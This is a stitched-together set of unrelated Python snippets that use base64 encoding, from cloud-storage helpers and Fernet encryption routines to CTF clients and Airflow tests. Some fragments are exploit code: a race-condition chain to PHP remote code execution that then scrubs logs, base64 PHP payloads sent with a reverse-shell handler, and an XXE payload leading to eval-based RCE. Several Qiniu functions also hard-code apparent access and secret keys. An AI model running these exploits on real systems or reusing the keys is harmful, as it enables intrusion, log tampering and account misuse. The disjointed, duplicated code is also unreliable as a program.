def qiniufetch(url, bucket, filename):
"""调用七牛的fetch API 将url的图片存储到七牛"""
from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest
access_key = "Mm3eTLInPMoWnh2uBpZ8MarSQw1esZdaCmQgqapu"
secret_key = "3msmgC6ZISF9tjJcXsYZcr10tOjG13fX0-pdtMKb"
encoded_url = b64e(url)
dest_entry = "%s:%s" % (bucket, filename)
encoded_entry = b64e(dest_entry.encode('utf-8'))
api_host = "iovip.qbox.me"
api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)
mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)
ret, err = client.call(path=api_path)
if err is not None:
print "Fetch image file\"%s\" failed" % url
print err
return None
else:
print "Fetch \"%s\" to qiniu \"%s\" success!" % (url, dest_entry)
return "http://%s.qiniudn.com/%s" % (bucket,
quote(filename.encode('utf-8')))
pass
def new_passphrase(config, passphrase, salt=None):
if salt is None:
salt = Random.new().read(8) # 64-bit salt
pbkdf2 = PBKDF2(passphrase, salt, iterations=1 << 14)
config['passphrase_salt'] = b64e(salt)
config['passphrase_aes_key'] = b64e(pbkdf2.read(32)) # AES256
config['passphrase_sha256hmac_key'] = b64e(pbkdf2.read(SHA256.digest_size))
def new_passphrase(config, passphrase, salt=None):
if salt is None:
salt = Random.new().read(8) # 64-bit salt
pbkdf2 = PBKDF2(passphrase, salt, iterations=1 << 14)
config['passphrase_salt'] = b64e(salt)
config['passphrase_aes_key'] = b64e(pbkdf2.read(32)) # AES256
config['passphrase_sha256hmac_key'] = b64e(pbkdf2.read(SHA256.digest_size))
def qiniufetch(url,bucket,filename):
"""调用七牛的fetch API 将url的图片存储到七牛"""
from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest
access_key = "qS-5BhmoJIM5WITHYwzooxlTiT70vWP9fyNXd_fT"
secret_key = "5JOR1EiOXN-pbqvNoAf4v4YLmnSMB2rvqy13u3f5"
encoded_url = b64e(url)
dest_entry = "%s:%s" % (bucket, filename)
encoded_entry = b64e(dest_entry.encode('utf-8'))
api_host = "iovip.qbox.me"
api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)
mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)
ret, err = client.call(path=api_path)
if err is not None:
print "Fetch image file\"%s\" failed" % url
print err
return None
else:
print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry)
return "http://%s.qiniudn.com/%s" % (bucket,urllib.quote(filename.encode('utf-8')))
def qiniufetch(url,bucket,filename):
"""调用七牛的fetch API 将url的图片存储到七牛"""
from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest
access_key = "Mm3eTLInPMoWnh2uBpZ8MarSQw1esZdaCmQgqapu"
secret_key = "3msmgC6ZISF9tjJcXsYZcr10tOjG13fX0-pdtMKb"
encoded_url = b64e(url)
dest_entry = "%s:%s" % (bucket, filename)
encoded_entry = b64e(dest_entry.encode('utf-8'))
api_host = "iovip.qbox.me"
api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)
mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)
ret, err = client.call(path=api_path)
if err is not None:
print "Fetch image file\"%s\" failed" % url
print err
return None
else:
print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry)
return "http://%s.qiniudn.com/%s" % (bucket,quote(filename.encode('utf-8')))
pass
def sendKeys(S, E):
raw = nc.read_until(b">>> ")
nc.write(b'2\n')
nc.read_until(b'S_a = ')
nc.write(b64e(compress(S.tobytes())) + b'\n')
nc.read_until(b'E_a = ')
nc.write(b64e(compress(E.tobytes())) + b'\n')
print(nc.read())
def init(config, crypto='aes'):
if 'crypto' in config:
crypto = config['crypto']
config['crypto'] = crypto
rng = Random.new()
if 'aes_key' not in config:
config['aes_key'] = b64e(rng.read(32)) # AES256
if 'sha256hmac_key' not in config:
config['sha256hmac_key'] = b64e(rng.read(SHA256.digest_size))
def flag_generator():
flag = "CBA{Reverse_engineering_is_awesome!}"
flag = flag.encode('zlib')
for i in range(randint(0, 10)):
flag = b64e(flag)
return b64e(flag)
def init(config, crypto='aes'):
if 'crypto' in config:
crypto = config['crypto']
config['crypto'] = crypto
rng = Random.new()
if 'aes_key' not in config:
config['aes_key'] = b64e(rng.read(32)) # AES256
if 'sha256hmac_key' not in config:
config['sha256hmac_key'] = b64e(rng.read(SHA256.digest_size))
def password_encrypt(self, message: bytes, iterations: int) -> bytes:
""" Symmetric encryption leveraging Fernet. Use the salt and iterations to encrypt
the message. """
salt = secrets.token_bytes(self.default_salt_bytes)
key = self.derive_key(salt, iterations)
return b'~'.join([
b64e(salt),
b64e(iterations.to_bytes(int(log(iterations, 256)) + 1, 'big')),
Fernet(key).encrypt(message)
])
def testKeys(U, C, keyB):
raw = nc.read_until(b">>> ")
nc.write(b'1\n')
nc.read_until(b'U = ')
nc.write(b64e(compress(U.tobytes())) + b'\n')
nc.read_until(b'C = ')
nc.write(b64e(compress(C.tobytes())) + b'\n')
nc.read_until(b'key_b = ')
nc.write(b64e(compress(keyB.tobytes())) + b'\n')
ret = nc.read_until(b'\n').decode()
return 'Success' in ret
def login():
name = request.form['username']
app.logger.info("LOGIN: %s" % (name))
client_key = key_for(name)
if client_key is None:
app.logger.warn("No key exists for user %s. User may not be registered." % name)
abort(401)
secret = auth.generate_secret()
p1 = auth.encrypt(secret, client_key)
p2 = auth.encrypt(secret, auth.key())
return json.dumps({'client_secret': b64e(p1), 'server_secret': b64e(p2)})
def try_kex(U, C, kb):
send_str('1')
get_until_prompt(b'U = ')
sock.send(b64e(compress(U.tobytes())) + b'\n')
get_until_prompt(b'C = ')
sock.send(b64e(compress(C.tobytes())) + b'\n')
get_until_prompt(b'key_b = ')
sock.send(b64e(compress(kb.tobytes())) + b'\n')
lines = get_until_prompt().splitlines()
if lines[0] == 'Failure.':
return False
if lines[0] == 'Success, the server and the client share the same key!':
return True
assert 0
def _derive_key(password, salt, iterations=iterations):
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iterations,
backend=backend)
return b64e(kdf.derive(password))
def decrypt(cls, value):
from django.conf import settings
decoded = b64d(value.encode())
salt, encrypted_value = decoded[:16], b64e(decoded[16:])
key = cls.get_key(force_bytes(settings.SECRET_KEY), salt)
return Fernet(key).decrypt(encrypted_value).decode()
def obscure(data: bytes) -> bytes:
"""
Obscure data bytes to unreadable bytes
:param data: Data bytes to obscure
:return: Obscured data bytes
"""
return b64e(compress(data, 9))
def password_encrypt(message: bytes,
password: str,
iterations: int = iterations) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(password.encode(), salt, iterations)
return b64e(b'%b%b%b' % (salt, iterations.to_bytes(
4, 'big'), b64d(Fernet(key).encrypt(message))))
def decrypt_value(secret: str, encrypted_value: str) -> str:
decoded = b64d(encrypted_value)
salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:])
iterations = int.from_bytes(iter, 'big')
key = PasswordsEncryption._derive_key(secret.encode(), salt)
initial_data = Fernet(key).decrypt(token)
return initial_data.decode()
def do_pubkey(self, data):
print "Generating RSA key..."
#self.rsa = RSA.generate(4096)
# If you find p and q which this is fast for, put them in here.
#p, q = Crypto.Util.number.getPrime(2048), Crypto.Util.number.getPrime(2048) #379, Crypto.Util.number.getPrime(4095)
#e = 1
#N = p*q
#d = Crypto.Util.number.inverse(e, (q-1)*(p-1))
num_cop = 20
bits = (4096 // num_cop) + 2
#ps = [Crypto.Util.number.getPrime(bits) for i in range(x)]
ps = [gmpy2.mpz(Crypto.Util.number.getPrime(bits)) for i in range(num_cop)]
e = gmpy2.mpz(Crypto.Util.number.getPrime(32))
N = 1
for x in ps:
N *= x
#next x
#print('e', e, len(hex(e)[2:]) * 4)
self.v = four1c2.fuckedRSA(ps, e)
print('e=', self.v.e, len(hex(self.v.e)[2:])*4)
self.rsa = RSA.construct((long(N), long(self.v.e), long(self.v.d)))
pub = self.rsa.publickey()
self.state = 'challange'
self.sendLine(b64e(pub.exportKey(format='DER')))
def decrypt(self, ctext: str, password: str) -> str:
ctext = ctext.encode()
decoded = b64d(ctext)
salt, iter, ctext = decoded[:16], decoded[16:20], b64e(decoded[20:])
iterations = int.from_bytes(iter, "big")
key = self._derive_key(password.encode(), salt, iterations)
return Fernet(key).decrypt(ctext).decode()
def encrypt_data(jd: dict, time: int) -> dict:
'''
生成加密请求体
参数:
jd: 明文请求体
time: 整数时间戳
返回:
dict: 密文请求体
'''
sjd = json.dumps(jd, separators=(',', ':'))
zjd = gzip.compress(sjd.encode('utf-8'))
zjd = b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00' + zjd[10:]
des_key = gen_random_str(8)
des_unit = pyDes.des(des_key,
pyDes.CBC,
DES_IV,
pad=None,
padmode=pyDes.PAD_PKCS5)
des_enc = des_unit.encrypt(zjd)
des_enc = b64e(des_enc).decode('utf-8')
rsa_enc = rsa_encrypt(des_key)
s_rsa = md5_calc(f'{rsa_enc}{time}')
s_des = md5_calc(des_enc)
ejd = {'data': des_enc, 'key': rsa_enc, 'sid': f'{s_rsa}{s_des}'}
return (ejd)
def password_decrypt(token: str, password: str) -> str:
token = token.encode()
decoded = b64d(token)
salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:])
iterations = int.from_bytes(iter, 'big')
key = _derive_key(password.encode(), salt, iterations)
return Fernet(key).decrypt(token).decode()
def encrypt(cls, value):
from django.conf import settings
salt = secrets.token_bytes(16)
key = cls.get_key(force_bytes(settings.SECRET_KEY), salt)
encrypted_value = b64d(Fernet(key).encrypt(value.encode()))
return b64e(b"%b%b" % (salt, encrypted_value)).decode()
def decrypt_message(crypted_data, passphrase):
"""Decrypt secret with passphrase."""
decoded = b64d(crypted_data)
salt, iter, crypted_data = decoded[:16], decoded[16:20], b64e(decoded[20:])
iterations = int.from_bytes(iter, 'big')
key = _derive_key(passphrase.encode(), salt, iterations)
return Fernet(key).decrypt(crypted_data).decode('utf-8')
def write_key_to_file(key):
""" Write new HMACing key """
try:
with open(KEY_FILE, 'wb') as key_file:
key_file.write(b64e(key))
except:
logging.warning("error writing to key file")
def _derive_key(passphrase, salt, iterations=100_000):
"""Derive a secret key from a given passphrase and salt."""
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iterations,
backend=default_backend())
return b64e(kdf.derive(passphrase))
def pwd_encrypt(message: (str, bytes), pwd: str, i: int = 100_000) -> bytes:
message = message if isinstance(message,
bytes) else message.encode('utf-8')
zout = secrets.token_bytes(16)
key = __derive_key(pwd.encode(), zout, i)
return b64e(
b'%b%b%b' %
(zout, i.to_bytes(4, 'big'), b64d(Fernet(key).encrypt(message))))
def _derive_key(password: bytes, salt: bytes, iterations: int) -> bytes:
"""Derive a secret key from a given password and salt"""
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iterations,
backend=backend)
return b64e(kdf.derive(password))
def sign_message(self, message, key_file, signature_name):
private_key = self.__load_private_key_from_file(key_file)
signature = private_key.sign(
message.encode(),
padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256())
signature_file = open(f"{signature_name}.sig", "w+")
signature_file.write(b64e(signature).decode())
def handle_put(self, conn, body=None, length=None, mime=None, name=None):
droid.log("Got %s" % name)
droid.eventPost("taxi-server", json.dumps({
"name": "got-content",
"body": b64e(body),
"length": length,
"mime": mime or mimetypes.guess_type(name)[0],
"file": name
}))
def value_encrypt(message: bytes, password: str, iterations: int) -> bytes:
salt = os.urandom(16)
key = _derive_key(password.encode(), salt, iterations)
print("Key is: %s" % (key, ))
return b64e(b'%b%b%b' % (
salt,
iterations.to_bytes(4, 'big'),
b64d(Fernet(key).encrypt(message)),
))
def get_key(secret, salt):
return b64e(
PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
backend=default_backend(),
).derive(secret))
def encrypt_message(message, passphrase, iterations=100_000):
"""Encrypt secret with passphrase."""
salt = secrets.token_bytes(16)
key = _derive_key(passphrase.encode(), salt, iterations)
return b64e(b'%b%b%b' % (
salt,
iterations.to_bytes(4, 'big'),
b64d(Fernet(key).encrypt(message)),
))
def password_encrypt(message: bytes, key: bytes) -> bytes:
current_time = int(time.time()).to_bytes(8, 'big')
algorithm = algorithms.AES(key)
iv = secrets.token_bytes(algorithm.block_size // 8)
cipher = Cipher(algorithm, modes.GCM(iv), backend=backend)
encryptor = cipher.encryptor()
encryptor.authenticate_additional_data(current_time)
ciphertext = encryptor.update(message) + encryptor.finalize()
return b64e(current_time + iv + ciphertext + encryptor.tag)
def derive_key(self, salt: bytes, iterations: int) -> bytes:
""" Also known as key stretching, we compute the key with a salt and
any number of iterations to generate a derived key. """
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=iterations,
backend=self.backend)
return b64e(kdf.derive(self.passphrase.encode()))
def password_decrypt(self, token: bytes, password: str) -> bytes:
decoded = b64d(token)
salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:])
iterations = int.from_bytes(iter, 'big')
key = self._derive_key(password.encode(), salt, iterations)
try:
data = Fernet(key).decrypt(token)
except InvalidToken as e:
return None
return Fernet(key).decrypt(token)
def _generate_messages(self, count):
messages = []
for i in range(1, count + 1):
messages.append({
'ackId': '%s' % i,
'message': {
'data': b64e('Message {}'.format(i).encode('utf8')),
'attributes': {'type': 'generated message'}
}
})
return messages
def _generate_messages(self, count):
messages = []
for i in range(1, count + 1):
messages.append({
'ackId': '%s' % i,
'message': {
'data': b64e('Message {}'.format(i).encode('utf8')),
'attributes': {'type': 'generated message'}
}
})
return messages
def encrypt(self, text: str, password: str, iterations: int = None) -> str:
if iterations is None:
iterations = self.iterations
assert isinstance(iterations, int)
salt = secrets.token_bytes(16)
key = self._derive_key(password.encode(), salt, iterations)
return b64e(b"%b%b%b" % (
salt,
iterations.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(text.encode())),
)).decode()
def start_pain_train(t, s):
if we_can_set_settings(t, s):
print "(+) updated the settings!"
if we_can_upload(t, s):
print "(+) wrote php code!"
print "(+) attempting race condition..."
r = Thread(target=race, args=(t,))
r.start()
if we_won_race(t, s, r):
print "(+) won the race!"
if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')):
print "(+) rce is proven!"
if we_can_clean_up(t, s) and we_can_clear_logs(t, s):
print "(+) deleted the image and scrubbed the logs!"
exec_code(t)
def send_message(name, msg):
keyA, body = auth.aes_encrypt(msg)
body = b64e(body)
recipient_key = key_for(name)
if recipient_key is None:
return False
keyA2 = keyA
keyA = b64e(auth.encrypt(keyA, recipient_key))
keyA2 = b64e(auth.encrypt(keyA2, auth.public_key()))
payload = {'sender': username, 'recipient': name, 'body': body, 'key': keyA, 'sender_key': keyA2}
sig = b64e(str(auth.sign(username+name+body)))
payload['signature'] = str(sig)
keyB, payload = auth.aes_encrypt(json.dumps(payload))
payload = b64e(payload)
keyB = b64e(auth.encrypt(keyB, auth.server_key()))
post("messages", {'key': keyB, 'payload': payload})
# coding=utf-8
import sys
sys.path.insert(0, "../../")
from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest
access_key = ""
secret_key = ""
src_url = ""
dest_bucket = ""
dest_key = ""
encoded_url = b64e(src_url)
dest_entry = "%s:%s" % (dest_bucket, dest_key)
encoded_entry = b64e(dest_entry)
api_host = "iovip.qbox.me"
api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry)
mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)
ret, err = client.call(path=api_path)
if err is not None:
print "failed"
print err
else:
print "success"
def parsestr(userarg):
userpass=userarg.split(':')
if len(userpass)==1:
pwd=self.console.prompt('Enter host password for user \'%s\': '%userpass[0],1)
userpass.append(pwd)
return b64e(':'.join(userpass))[:-1]
def suntzu_omfg_no_one_can_steal_my_software_yo():
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
def login():
global cookie
resp = post("login", {'username': username})
if resp.status_code != 200:
return False
data = json.loads(resp.text)
client_secret = b64d(data['client_secret'])
secret = auth.decrypt(client_secret)
sig = auth.sign(secret)
resp = post("authorise", {'username': username, 'server_secret': data['server_secret'], 'signature': b64e(str(sig))})
if resp.status_code == 200:
cookie = resp.cookies
return True
return False
def exec_code(target):
handlerthr = Thread(target=handler, args=(cb_port,))
handlerthr.start()
we_can_exec_php(target, b64e(build_php_code()))
def hex_to_b64(h):
return b64e(unhexlify(h))
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
TASK_ID = 'test-task-id'
TEST_PROJECT = 'test-project'
TEST_TOPIC = 'test-topic'
TEST_SUBSCRIPTION = 'test-subscription'
TEST_MESSAGES = [
{
'data': b64e(b'Hello, World!'),
'attributes': {'type': 'greeting'}
},
{'data': b64e(b'Knock, knock')},
{'attributes': {'foo': ''}}]
TEST_POKE_INTERVAl = 0
class PubSubTopicCreateOperatorTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.pubsub_operator.PubSubHook')
def test_failifexists(self, mock_hook):
operator = PubSubTopicCreateOperator(task_id=TASK_ID,
project=TEST_PROJECT,
topic=TEST_TOPIC,
fail_if_exists=True)
def exec_code():
phpkodez = b64e(build_php_code())
handlerthr = Thread(target=handler, args=(lport,))
handlerthr.start()
requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
# coding=utf-8
import sys
sys.path.insert(0, "../../")
from base64 import urlsafe_b64encode as b64e
from qiniu.auth import digest
access_key = ""
secret_key = ""
bucket = ""
key = ""
entry = "%s:%s" % (bucket, key)
encoded_entry = b64e(entry)
api_host = "iovip.qbox.me"
api_path = "/prefetch/%s" % (encoded_entry)
mac = digest.Mac(access=access_key, secret=secret_key)
client = digest.Client(host=api_host, mac=mac)
ret, err = client.call(path=api_path)
if err is not None:
print "failed"
print err
else:
print "success"
